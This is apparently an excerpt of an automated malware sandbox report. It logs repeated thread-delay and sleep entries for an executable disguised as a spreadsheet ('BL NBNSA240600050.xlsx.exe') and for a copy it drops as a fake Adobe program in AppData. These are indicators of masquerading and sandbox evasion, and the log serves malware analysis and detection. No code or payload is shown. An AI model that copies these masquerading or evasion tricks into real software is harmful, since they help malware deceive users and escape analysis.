Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 596264	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 595315	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 594438	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239546	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239187	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239078	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599311	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598718	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598336	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597872	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594649	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594546	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594436	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239843	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239733	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239513	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239406	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239296	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239177	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599889
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599563
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599438
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599078
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598969
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598844
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598735
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598610
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598485
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598360
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598235
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598110
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597985
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597610
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597485
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597360
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597235
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596985
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596860
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596735
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596610
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596360
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596110
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595985
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595860
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595735
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595610
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595485
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595360
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595235
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595110
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594985
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594860
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594735
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594610
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594485
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594360
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594235
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594110
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 593985

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Window / User API: threadDelayed 814	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Window / User API: threadDelayed 1740	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Window / User API: threadDelayed 1962	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Window / User API: threadDelayed 7895	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window / User API: threadDelayed 896	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window / User API: threadDelayed 2575	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window / User API: threadDelayed 7264	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window / User API: threadDelayed 918	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window / User API: threadDelayed 456	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window / User API: threadDelayed 1998
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Window / User API: threadDelayed 7819

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152	Thread sleep time: -239891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152	Thread sleep time: -239770s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152	Thread sleep time: -239641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152	Thread sleep time: -239531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152	Thread sleep time: -239422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152	Thread sleep time: -239313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152	Thread sleep time: -239188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152	Thread sleep time: -239063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152	Thread sleep time: -238953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152	Thread sleep time: -238844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152	Thread sleep time: -238719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152	Thread sleep time: -238587s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152	Thread sleep time: -238266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152	Thread sleep time: -238157s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7152	Thread sleep time: -238047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 7160	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6200	Thread sleep count: 1962 > 30	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -599859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -599733s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -599625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6200	Thread sleep count: 7895 > 30	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -599516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -599406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -599297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -599187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -599078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -598734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -598515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -598406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -598297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -598185s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -598078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -597969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -597844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -597734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -597625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -597515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -597406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -597297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -597188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -596938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -596719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -596594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -596375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -596264s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -595937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -595828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -595719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -595594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -595484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -595315s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -595203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -595094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -594984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -594875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -594766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -594656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -594547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe TID: 6392	Thread sleep time: -594438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3236	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3236	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5828	Thread sleep count: 896 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3236	Thread sleep time: -239875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5828	Thread sleep count: 285 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3236	Thread sleep time: -239765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3236	Thread sleep time: -239656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3236	Thread sleep time: -239546s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3236	Thread sleep time: -239312s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3236	Thread sleep time: -239187s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3236	Thread sleep time: -239078s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 6020	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7304	Thread sleep count: 2575 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7304	Thread sleep count: 7264 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -599655s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -599531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -599311s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -598953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -598828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -598718s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -598609s >= -30000s	Jump to behavior
